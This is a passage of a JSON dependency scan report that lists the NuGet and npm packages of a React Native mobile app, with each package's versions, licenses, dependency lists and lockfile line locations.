"pkg:nuget/Microsoft.JavaScript.Hermes@0.1.23", "UID": "40c44ff113e9e6e3" }, "Version": "0.1.23", "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 25, "EndLine": 29 } ], "AnalyzedBy": "nuget" }, { "ID": "Microsoft.Web.WebView2@1.0.1264.42", "Name": "Microsoft.Web.WebView2", "Identifier": { "PURL": "pkg:nuget/Microsoft.Web.WebView2@1.0.1264.42", "UID": "117308d8a5ad5a57" }, "Version": "1.0.1264.42", "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 30, "EndLine": 34 }, { "StartLine": 71, "EndLine": 75 }, { "StartLine": 78, "EndLine": 82 }, { "StartLine": 85, "EndLine": 89 }, { "StartLine": 92, "EndLine": 96 }, { "StartLine": 99, "EndLine": 103 }, { "StartLine": 106, "EndLine": 110 }, { "StartLine": 113, "EndLine": 117 } ], "AnalyzedBy": "nuget" }, { "ID": "boost@1.83.0", "Name": "boost", "Identifier": { "PURL": "pkg:nuget/boost@1.83.0", "UID": "6ad03ef5da326003" }, "Version": "1.83.0", "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 20, "EndLine": 24 } ], "AnalyzedBy": "nuget" } ] }, { "Target": "node_modules/react-native-tts/windows/RNTTS/packages.config", "Class": "lang-pkgs", "Type": "nuget", "Packages": [ { "Name": "Microsoft.Windows.CppWinRT", "Identifier": { "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.200316.3", "UID": "996e95c5ca3f698e" }, "Version": "2.0.200316.3", "AnalyzedBy": "nuget" } ] }, { "Target": "node_modules/react-native-video/windows/ReactNativeVideoCPP/packages.config", "Class": "lang-pkgs", "Type": "nuget", "Packages": [ { "Name": "Microsoft.Windows.CppWinRT", "Identifier": { "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.200316.3", "UID": "9b1357d64f041788" }, "Version": "2.0.200316.3", "AnalyzedBy": "nuget" } ] }, { "Target": "node_modules/react-native-video/windows/ReactNativeVideoCPP61/packages.config", "Class": "lang-pkgs", "Type": "nuget", "Packages": [ { "Name": "Microsoft.Windows.CppWinRT", "Identifier": { "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.190730.2", "UID": "3e56bedf963d81a1" }, "Version": "2.0.190730.2", "AnalyzedBy": "nuget" } ] }, { "Target": "package-lock.json", "Class": "lang-pkgs", "Type": "npm", "Packages": [ { "ID": "@babel/core@7.28.4", "Name": "@babel/core", "Identifier": { "PURL": "pkg:npm/%40babel/core@7.28.4", "UID": "24fba3b32aceebec" }, "Version": "7.28.4", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@babel/code-frame@7.27.1", "@babel/generator@7.28.3", "@babel/helper-compilation-targets@7.27.2", "@babel/helper-module-transforms@7.28.3", "@babel/helpers@7.28.4", "@babel/parser@7.28.4", "@babel/template@7.27.2", "@babel/traverse@7.28.4", "@babel/types@7.28.4", "@jridgewell/remapping@2.3.5", "convert-source-map@2.0.0", "debug@4.4.3", "gensync@1.0.0-beta.2", "json5@2.2.3", "semver@6.3.1" ], "Locations": [ { "StartLine": 162, "EndLine": 191 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/runtime@7.28.4", "Name": "@babel/runtime", "Identifier": { "PURL": "pkg:npm/%40babel/runtime@7.28.4", "UID": "435faceec0358313" }, "Version": "7.28.4", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 2059, "EndLine": 2067 } ], "AnalyzedBy": "npm" }, { "ID": "@dominicvonk/react-native-apk-installer@2.2.2", "Name": "@dominicvonk/react-native-apk-installer", "Identifier": { "PURL": "pkg:npm/%40dominicvonk/react-native-apk-installer@2.2.2", "UID": "ac83fa5f50422c94" }, "Version": "2.2.2", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 2185, "EndLine": 2194 } ], "AnalyzedBy": "npm" }, { "ID": "@mapbox/polyline@1.2.1", "Name": "@mapbox/polyline", "Identifier": { "PURL": "pkg:npm/%40mapbox/polyline@1.2.1", "UID": "2bc359775a0f8f7c" }, "Version": "1.2.1", "Relationship": "direct", "DependsOn": [ "meow@9.0.0" ], "Locations": [ { "StartLine": 3878, "EndLine": 3888 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native-async-storage/async-storage@1.24.0", "Name": "@react-native-async-storage/async-storage", "Identifier": { "PURL": "pkg:npm/%40react-native-async-storage/async-storage@1.24.0", "UID": "e90469bc2ab47497" }, "Version": "1.24.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "merge-options@3.0.4", "react-native@0.81.0" ], "Locations": [ { "StartLine": 4047, "EndLine": 4058 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native-clipboard/clipboard@1.16.3", "Name": "@react-native-clipboard/clipboard", "Identifier": { "PURL": "pkg:npm/%40react-native-clipboard/clipboard@1.16.3", "UID": "be80c41c886aa739" }, "Version": "1.16.3", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 4059, "EndLine": 4081 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native-community/checkbox@0.5.20", "Name": "@react-native-community/checkbox", "Identifier": { "PURL": "pkg:npm/%40react-native-community/checkbox@0.5.20", "UID": "9646190107e3249b" }, "Version": "0.5.20", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 4082, "EndLine": 4097 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native-community/cli@20.0.0", "Name": "@react-native-community/cli", "Identifier": { "PURL": "pkg:npm/%40react-native-community/cli@20.0.0", "UID": "b11d5c85115cbb03" }, "Version": "20.0.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@react-native-community/cli-clean@20.0.0", "@react-native-community/cli-config@20.0.0", "@react-native-community/cli-doctor@20.0.0", "@react-native-community/cli-server-api@20.0.0", "@react-native-community/cli-tools@20.0.0", "@react-native-community/cli-types@20.0.0", "chalk@4.1.2", "commander@9.5.0", "deepmerge@4.3.1", "execa@5.1.1", "find-up@5.0.0", "fs-extra@8.1.0", "graceful-fs@4.2.11", "prompts@2.4.2", "semver@7.7.3" ], "Locations": [ { "StartLine": 4098, "EndLine": 4127 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native-community/cli-platform-android@20.0.0", "Name": "@react-native-community/cli-platform-android", "Identifier": { "PURL": "pkg:npm/%40react-native-community/cli-platform-android@20.0.0", "UID": "d314a2169c6a33e0" }, "Version": "20.0.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@react-native-community/cli-config-android@20.0.0", "@react-native-community/cli-tools@20.0.0", "chalk@4.1.2", "execa@5.1.1", "logkitty@0.7.1" ], "Locations": [ { "StartLine": 4219, "EndLine": 4232 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native-community/cli-platform-ios@20.0.0", "Name": "@react-native-community/cli-platform-ios", "Identifier": { "PURL": "pkg:npm/%40react-native-community/cli-platform-ios@20.0.0", "UID": "580c92f53e79b3e1" }, "Version": "20.0.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@react-native-community/cli-platform-apple@20.0.0" ], "Locations": [ { "StartLine": 4247, "EndLine": 4256 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native-community/datetimepicker@8.4.5", "Name": "@react-native-community/datetimepicker", "Identifier": { "PURL": "pkg:npm/%40react-native-community/datetimepicker@8.4.5", "UID": "a88e71e489a507d4" }, "Version": "8.4.5", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "invariant@2.2.4", "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 4344, "EndLine": 4366 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native-community/masked-view@0.1.11", "Name": "@react-native-community/masked-view", "Identifier": { "PURL": "pkg:npm/%40react-native-community/masked-view@0.1.11", "UID": "f1ea3d01a8361594" }, "Version": "0.1.11", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 4367, "EndLine": 4377 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native-community/netinfo@11.4.1", "Name": "@react-native-community/netinfo", "Identifier": { "PURL": "pkg:npm/%40react-native-community/netinfo@11.4.1", "UID": "3874f3bd665e9130" }, "Version": "11.4.1", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native@0.81.0" ], "Locations": [ { "StartLine": 4378, "EndLine": 4386 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native-community/slider@5.0.1", "Name": "@react-native-community/slider", "Identifier": { "PURL": "pkg:npm/%40react-native-community/slider@5.0.1", "UID": "70671f3262b5e3ba" }, "Version": "5.0.1", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 4401, "EndLine": 4406 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native-firebase/app@23.4.0", "Name": "@react-native-firebase/app", "Identifier": { "PURL": "pkg:npm/%40react-native-firebase/app@23.4.0", "UID": "508bb23c221d6eba" }, "Version": "23.4.0", "Licenses": [ "Apache-2.0" ], "Relationship": "direct", "DependsOn": [ "firebase@12.2.1", "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 4407, "EndLine": 4425 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native-firebase/crashlytics@23.4.0", "Name": "@react-native-firebase/crashlytics", "Identifier": { "PURL": "pkg:npm/%40react-native-firebase/crashlytics@23.4.0", "UID": "4cd9a9ec2d6500eb" }, "Version": "23.4.0", "Licenses": [ "Apache-2.0" ], "Relationship": "direct", "DependsOn": [ "@react-native-firebase/app@23.4.0", "stacktrace-js@2.0.2" ], "Locations": [ { "StartLine": 4426, "EndLine": 4443 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native-firebase/messaging@23.4.0", "Name": "@react-native-firebase/messaging", "Identifier": { "PURL": "pkg:npm/%40react-native-firebase/messaging@23.4.0", "UID": "6ab24e669f936e9" }, "Version": "23.4.0", "Licenses": [ "Apache-2.0" ], "Relationship": "direct", "DependsOn": [ "@react-native-firebase/app@23.4.0" ], "Locations": [ { "StartLine": 4444, "EndLine": 4458 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native-picker/picker@2.11.2", "Name": "@react-native-picker/picker", "Identifier": { "PURL": "pkg:npm/%40react-native-picker/picker@2.11.2", "UID": "f73e91874270c29f" }, "Version": "2.11.2", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 4459, "EndLine": 4471 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native/babel-preset@0.81.0", "Name": "@react-native/babel-preset", "Identifier": { "PURL": "pkg:npm/%40react-native/babel-preset@0.81.0", "UID": "c795e926f6f6f448" }, "Version": "0.81.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@babel/core@7.28.4", "@babel/plugin-proposal-export-default-from@7.27.1", "@babel/plugin-syntax-dynamic-import@7.8.3", "@babel/plugin-syntax-export-default-from@7.27.1", "@babel/plugin-syntax-nullish-coalescing-operator@7.8.3", "@babel/plugin-syntax-optional-chaining@7.8.3", "@babel/plugin-transform-arrow-functions@7.27.1", "@babel/plugin-transform-async-generator-functions@7.28.0", "@babel/plugin-transform-async-to-generator@7.27.1", "@babel/plugin-transform-block-scoping@7.28.4", "@babel/plugin-transform-class-properties@7.27.1", "@babel/plugin-transform-classes@7.28.4", "@babel/plugin-transform-computed-properties@7.27.1", "@babel/plugin-transform-destructuring@7.28.0", "@babel/plugin-transform-flow-strip-types@7.27.1", "@babel/plugin-transform-for-of@7.27.1", "@babel/plugin-transform-function-name@7.27.1", "@babel/plugin-transform-literals@7.27.1", "@babel/plugin-transform-logical-assignment-operators@7.27.1", "@babel/plugin-transform-modules-commonjs@7.27.1", "@babel/plugin-transform-named-capturing-groups-regex@7.27.1", "@babel/plugin-transform-nullish-coalescing-operator@7.27.1", "@babel/plugin-transform-numeric-separator@7.27.1", "@babel/plugin-transform-object-rest-spread@7.28.4", "@babel/plugin-transform-optional-catch-binding@7.27.1", "@babel/plugin-transform-optional-chaining@7.27.1", "@babel/plugin-transform-parameters@7.27.7", "@babel/plugin-transform-private-methods@7.27.1", "@babel/plugin-transform-private-property-in-object@7.27.1", "@babel/plugin-transform-react-display-name@7.28.0", "@babel/plugin-transform-react-jsx-self@7.27.1", "@babel/plugin-transform-react-jsx-source@7.27.1", "@babel/plugin-transform-react-jsx@7.27.1", "@babel/plugin-transform-regenerator@7.28.4", "@babel/plugin-transform-runtime@7.28.3", "@babel/plugin-transform-shorthand-properties@7.27.1", "@babel/plugin-transform-spread@7.27.1", "@babel/plugin-transform-sticky-regex@7.27.1", "@babel/plugin-transform-typescript@7.28.0", "@babel/plugin-transform-unicode-regex@7.27.1", "@babel/template@7.27.2", "@react-native/babel-plugin-codegen@0.81.0", "babel-plugin-syntax-hermes-parser@0.29.1", "babel-plugin-transform-flow-enums@0.0.2", "react-refresh@0.14.2" ], "Locations": [ { "StartLine": 4494, "EndLine": 4552 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native/metro-config@0.81.0", "Name": "@react-native/metro-config", "Identifier": { "PURL": "pkg:npm/%40react-native/metro-config@0.81.0", "UID": "59dfaa8a9bbb88da" }, "Version": "0.81.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@react-native/js-polyfills@0.81.0", "@react-native/metro-babel-transformer@0.81.0", "metro-config@0.83.3", "metro-runtime@0.83.3" ], "Locations": [ { "StartLine": 4744, "EndLine": 4758 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native/new-app-screen@0.81.0", "Name": "@react-native/new-app-screen", "Identifier": { "PURL": "pkg:npm/%40react-native/new-app-screen@0.81.0", "UID": "c8601f2af89c1006" }, "Version": "0.81.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@types/react@19.2.2", "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 4759, "EndLine": 4777 } ], "AnalyzedBy": "npm" }, { "ID": "@react-navigation/drawer@7.5.9", "Name": "@react-navigation/drawer", "Identifier": { "PURL": "pkg:npm/%40react-navigation/drawer@7.5.9", "UID": "c0afcefdfad52c5c" }, "Version": "7.5.9", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@react-navigation/elements@2.9.13", "@react-navigation/native@7.2.1", "color@4.2.3", "react-native-drawer-layout@4.1.13", "react-native-gesture-handler@2.28.0", "react-native-reanimated@4.3.0", "react-native-safe-area-context@5.6.1", "react-native-screens@4.16.0", "react-native@0.81.0", "react@19.1.0", "use-latest-callback@0.2.5" ], "Locations": [ { "StartLine": 4816, "EndLine": 4836 } ], "AnalyzedBy": "npm" }, { "ID": "@react-navigation/material-top-tabs@7.4.22", "Name": "@react-navigation/material-top-tabs", "Identifier": { "PURL": "pkg:npm/%40react-navigation/material-top-tabs@7.4.22", "UID": "6a4d5521746ec923" }, "Version": "7.4.22", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@react-navigation/elements@2.9.13", "@react-navigation/native@7.2.1", "color@4.2.3", "react-native-pager-view@8.0.0", "react-native-safe-area-context@5.6.1", "react-native-tab-view@4.3.0", "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 4860, "EndLine": 4877 } ], "AnalyzedBy": "npm" }, { "ID": "@react-navigation/native@7.2.1", "Name": "@react-navigation/native", "Identifier": { "PURL": "pkg:npm/%40react-navigation/native@7.2.1", "UID": "9e0c1e63e42259b2" }, "Version": "7.2.1", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@react-navigation/core@7.17.1", "escape-string-regexp@4.0.0", "fast-deep-equal@3.1.3", "nanoid@3.3.11", "react-native@0.81.0", "react@19.1.0", "use-latest-callback@0.2.5" ], "Locations": [ { "StartLine": 4878, "EndLine": 4894 } ], "AnalyzedBy": "npm" }, { "ID": "@react-navigation/stack@7.4.9", "Name": "@react-navigation/stack", "Identifier": { "PURL": "pkg:npm/%40react-navigation/stack@7.4.9", "UID": "7e91d4aea4ddb58d" }, "Version": "7.4.9", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@react-navigation/elements@2.9.13", "@react-navigation/native@7.2.1", "color@4.2.3", "react-native-gesture-handler@2.28.0", "react-native-safe-area-context@5.6.1", "react-native-screens@4.16.0", "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 4904, "EndLine": 4921 } ], "AnalyzedBy": "npm" }, { "ID": "@types/react@19.2.2", "Name": "@types/react", "Identifier": { "PURL": "pkg:npm/%40types/react@19.2.2", "UID": "9b9f63ac2db4eb72" }, "Version": "19.2.2", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "csstype@3.1.3" ], "Locations": [ { "StartLine": 5412, "EndLine": 5421 } ], "AnalyzedBy": "npm" }, { "ID": "axios@1.12.2", "Name": "axios", "Identifier": { "PURL": "pkg:npm/axios@1.12.2", "UID": "42b431016ae1856f" }, "Version": "1.12.2", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "follow-redirects@1.15.11", "form-data@4.0.4", "proxy-from-env@1.1.0" ], "Locations": [ { "StartLine": 6220, "EndLine": 6230 } ], "AnalyzedBy": "npm" }, { "ID": "babel-plugin-inline-import@3.0.0", "Name": "babel-plugin-inline-import", "Identifier": { "PURL": "pkg:npm/babel-plugin-inline-import@3.0.0", "UID": "a423b65edffb4e4a" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "require-resolve@0.0.2" ], "Locations": [ { "StartLine": 6266, "EndLine": 6274 } ], "AnalyzedBy": "npm" }, { "ID": "babel-plugin-module-resolver@5.0.3", "Name": "babel-plugin-module-resolver", "Identifier": { "PURL": "pkg:npm/babel-plugin-module-resolver@5.0.3", "UID": "562406cec7cecc4d" }, "Version": "5.0.3", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "find-babel-config@2.1.2", "glob@9.3.5", "pkg-up@3.1.0", "reselect@4.1.8", "resolve@1.22.10" ], "Locations": [ { "StartLine": 6322, "EndLine": 6334 } ], "AnalyzedBy": "npm" }, { "ID": "base-64@1.0.0", "Name": "base-64", "Identifier": { "PURL": "pkg:npm/base-64@1.0.0", "UID": "a0edd7331753e201" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 6566, "EndLine": 6571 } ], "AnalyzedBy": "npm" }, { "ID": "deprecated-react-native-prop-types@5.0.0", "Name": "deprecated-react-native-prop-types", "Identifier": { "PURL": "pkg:npm/deprecated-react-native-prop-types@5.0.0", "UID": "36ef3b286c378ac6" }, "Version": "5.0.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@react-native/normalize-colors@0.73.2", "invariant@2.2.4", "prop-types@15.8.1" ], "Locations": [ { "StartLine": 7864, "EndLine": 7877 } ], "AnalyzedBy": "npm" }, { "ID": "install@0.13.0", "Name": "install", "Identifier": { "PURL": "pkg:npm/install@0.13.0", "UID": "17d111c89512c73b" }, "Version": "0.13.0", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 10314, "EndLine": 10322 } ], "AnalyzedBy": "npm" }, { "ID": "mime@4.1.0", "Name": "mime", "Identifier": { "PURL": "pkg:npm/mime@4.1.0", "UID": "596cc776e354979" }, "Version": "4.1.0", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 12756, "EndLine": 12770 } ], "AnalyzedBy": "npm" }, { "ID": "moment@2.30.1", "Name": "moment", "Identifier": { "PURL": "pkg:npm/moment@2.30.1", "UID": "bed79a73cb90cecc" }, "Version": "2.30.1", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 13100, "EndLine": 13108 } ], "AnalyzedBy": "npm" }, { "ID": "npm@11.6.2", "Name": "npm", "Identifier": { "PURL": "pkg:npm/npm@11.6.2", "UID": "8b313f4400fc0efd" }, "Version": "11.6.2", "Licenses": [ "Artistic-2.0" ], "Relationship": "direct", "DependsOn": [ "@isaacs/string-locale-compare@1.1.0", "@npmcli/arborist@9.1.6", "@npmcli/config@10.4.2", "@npmcli/fs@4.0.0", "@npmcli/map-workspaces@5.0.0", "@npmcli/package-json@7.0.1", "@npmcli/promise-spawn@8.0.3", "@npmcli/redact@3.2.2", "@npmcli/run-script@10.0.0", "@sigstore/tuf@4.0.0", "abbrev@3.0.1", "archy@1.0.0", "cacache@20.0.1", "chalk@5.6.2", "ci-info@4.3.1", "cli-columns@4.0.0", "fastest-levenshtein@1.0.16", "fs-minipass@3.0.3", "glob@11.0.3", "graceful-fs@4.2.11", "hosted-git-info@9.0.2", "ini@5.0.0", "init-package-json@8.2.2", "is-cidr@6.0.1", "json-parse-even-better-errors@4.0.0", "libnpmaccess@10.0.3", "libnpmdiff@8.0.9", "libnpmexec@10.1.8", "libnpmfund@7.0.9", "libnpmorg@8.0.1", "libnpmpack@9.0.9", "libnpmpublish@11.1.2", "libnpmsearch@9.0.1", "libnpmteam@8.0.2", "libnpmversion@8.0.2", "make-fetch-happen@15.0.2", "minimatch@10.0.3", "minipass-pipeline@1.2.4", "minipass@7.1.2", "ms@2.1.3", "node-gyp@11.4.2", "nopt@8.1.0", "npm-audit-report@6.0.0", "npm-install-checks@7.1.2", "npm-package-arg@13.0.1", "npm-pick-manifest@11.0.1", "npm-profile@12.0.0", "npm-registry-fetch@19.0.0", "npm-user-validate@3.0.0", "p-map@7.0.3", "pacote@21.0.3", "parse-conflict-json@4.0.0", "proc-log@5.0.0", "qrcode-terminal@0.12.0", "read@4.1.0", "semver@7.7.3", "spdx-expression-parse@4.0.0", "ssri@12.0.0", "supports-color@10.2.2", "tar@7.5.1", "text-table@0.2.0", "tiny-relative-date@2.0.2", "treeverse@3.0.0", "validate-npm-package-name@6.0.2", "which@5.0.0" ], "Locations": [ { "StartLine": 13363, "EndLine": 13516 } ], "AnalyzedBy": "npm" }, { "ID": "react@19.1.0", "Name": "react", "Identifier": { "PURL": "pkg:npm/react@19.1.0", "UID": "3356d9e8cfbf2450" }, "Version": "19.1.0", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 17157, "EndLine": 17165 } ], "AnalyzedBy": "npm" }, { "ID": "react-native@0.81.0", "Name": "react-native", "Identifier": { "PURL": "pkg:npm/react-native@0.81.0", "UID": "f6b45ef17f562e6" }, "Version": "0.81.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@jest/create-cache-key-function@29.7.0", "@react-native/assets-registry@0.81.0", "@react-native/codegen@0.81.0", "@react-native/community-cli-plugin@0.81.0", "@react-native/gradle-plugin@0.81.0", "@react-native/js-polyfills@0.81.0", "@react-native/normalize-colors@0.81.0", "@react-native/virtualized-lists@0.81.0", "@types/react@19.2.2", "abort-controller@3.0.0", "anser@1.4.10", "ansi-regex@5.0.1", "babel-jest@29.7.0", "babel-plugin-syntax-hermes-parser@0.29.1", "base64-js@1.5.1", "commander@12.1.0", "flow-enums-runtime@0.0.6", "glob@7.2.3", "invariant@2.2.4", "jest-environment-node@29.7.0", "memoize-one@5.2.1", "metro-runtime@0.83.3", "metro-source-map@0.83.3", "nullthrows@1.1.1", "pretty-format@29.7.0", "promise@8.3.0", "react-devtools-core@6.1.5", "react-refresh@0.14.2", "react@19.1.0", "regenerator-runtime@0.13.11", "scheduler@0.26.0", "semver@7.7.3", "stacktrace-parser@0.1.11", "whatwg-fetch@3.6.20", "ws@6.2.3", "yargs@17.7.2" ], "Locations": [ { "StartLine": 17225, "EndLine": 17281 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-asset@2.1.1", "Name": "react-native-asset", "Identifier": { "PURL": "pkg:npm/react-native-asset@2.1.1", "UID": "b6911e4600b0588f" }, "Version": "2.1.1", "Licenses": [ "ISC" ], "Relationship": "direct", "DependsOn": [ "fs-extra@7.0.1", "lodash@4.17.21", "npmlog@4.1.2", "plist@3.1.0", "react-native@0.81.0", "sha1-file@1.0.4", "xcode@2.1.0" ], "Locations": [ { "StartLine": 17291, "EndLine": 17310 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-audio-recorder-player@3.5.3", "Name": "react-native-audio-recorder-player", "Identifier": { "PURL": "pkg:npm/react-native-audio-recorder-player@3.5.3", "UID": "7136f5335c9bc60e" }, "Version": "3.5.3", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "dooboolab-welcome@1.3.2", "react-native-audio-recorder-player@3.5.3", "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 17472, "EndLine": 17486 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-blob-util@0.22.2", "Name": "react-native-blob-util", "Identifier": { "PURL": "pkg:npm/react-native-blob-util@0.22.2", "UID": "7fbed5b4fd431068" }, "Version": "0.22.2", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "base-64@0.1.0", "glob@10.4.5", "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 17487, "EndLine": 17500 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-bootsplash@6.3.11", "Name": "react-native-bootsplash", "Identifier": { "PURL": "pkg:npm/react-native-bootsplash@6.3.11", "UID": "12f86e2c9977c697" }, "Version": "6.3.11", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@expo/config-plugins@10.1.2", "@react-native-community/cli-config-android@18.0.0", "@react-native-community/cli-config-apple@18.0.0", "@react-native-community/cli-tools@18.0.0", "commander@13.1.0", "detect-indent@6.1.0", "fs-extra@11.3.2", "node-html-parser@7.0.1", "picocolors@1.1.1", "prettier@3.6.2", "react-native-is-edge-to-edge@1.3.1", "react-native@0.81.0", "react@19.1.0", "sharp@0.32.6", "ts-dedent@2.2.0", "xml-formatter@3.6.7" ], "Locations": [ { "StartLine": 17526, "EndLine": 17554 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-camera-kit@15.1.0", "Name": "react-native-camera-kit", "Identifier": { "PURL": "pkg:npm/react-native-camera-kit@15.1.0", "UID": "501f8d8c70656d8f" }, "Version": "15.1.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 17680, "EndLine": 17692 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-chart-kit@6.12.0", "Name": "react-native-chart-kit", "Identifier": { "PURL": "pkg:npm/react-native-chart-kit@6.12.0", "UID": "6742f3a02eb5a56d" }, "Version": "6.12.0", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "lodash@4.17.21", "paths-js@0.4.11", "point-in-polygon@1.1.0", "react-native-svg@15.14.0", "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 17693, "EndLine": 17708 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-collapsible@1.6.2", "Name": "react-native-collapsible", "Identifier": { "PURL": "pkg:npm/react-native-collapsible@1.6.2", "UID": "6f5de9d570affcd2" }, "Version": "1.6.2", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 17709, "EndLine": 17718 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-contacts@8.0.10", "Name": "react-native-contacts", "Identifier": { "PURL": "pkg:npm/react-native-contacts@8.0.10", "UID": "25d908ed85a1f7cf" }, "Version": "8.0.10", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 17719, "EndLine": 17728 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-device-info@14.1.1", "Name": "react-native-device-info", "Identifier": { "PURL": "pkg:npm/react-native-device-info@14.1.1", "UID": "65daacdc0ca35253" }, "Version": "14.1.1", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native@0.81.0" ], "Locations": [ { "StartLine": 17729, "EndLine": 17737 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-draggable-flatlist@4.0.3", "Name": "react-native-draggable-flatlist", "Identifier": { "PURL": "pkg:npm/react-native-draggable-flatlist@4.0.3", "UID": "f8faa97c6ae5bb13" }, "Version": "4.0.3", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "@babel/preset-typescript@7.27.1", "react-native-gesture-handler@2.28.0", "react-native-reanimated@4.3.0", "react-native@0.81.0" ], "Locations": [ { "StartLine": 17738, "EndLine": 17751 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-exit-app@2.0.0", "Name": "react-native-exit-app", "Identifier": { "PURL": "pkg:npm/react-native-exit-app@2.0.0", "UID": "947fb7cd1d34d9a6" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Relationship": "direct", "Locations": [ { "StartLine": 17767, "EndLine": 17772 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-file-viewer@2.1.5", "Name": "react-native-file-viewer", "Identifier": { "PURL": "pkg:npm/react-native-file-viewer@2.1.5", "UID": "737c8bd8eff84213" }, "Version": "2.1.5", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "react-native@0.81.0" ], "Locations": [ { "StartLine": 17773, "EndLine": 17781 } ], "AnalyzedBy": "npm" }, { "ID": "react-native-fs@2.20.0", "Name": "react-native-fs", "Identifier": { "PURL": "pkg:npm/react-native-fs@2.20.0", "UID": "24700b1ce7dff8aa" 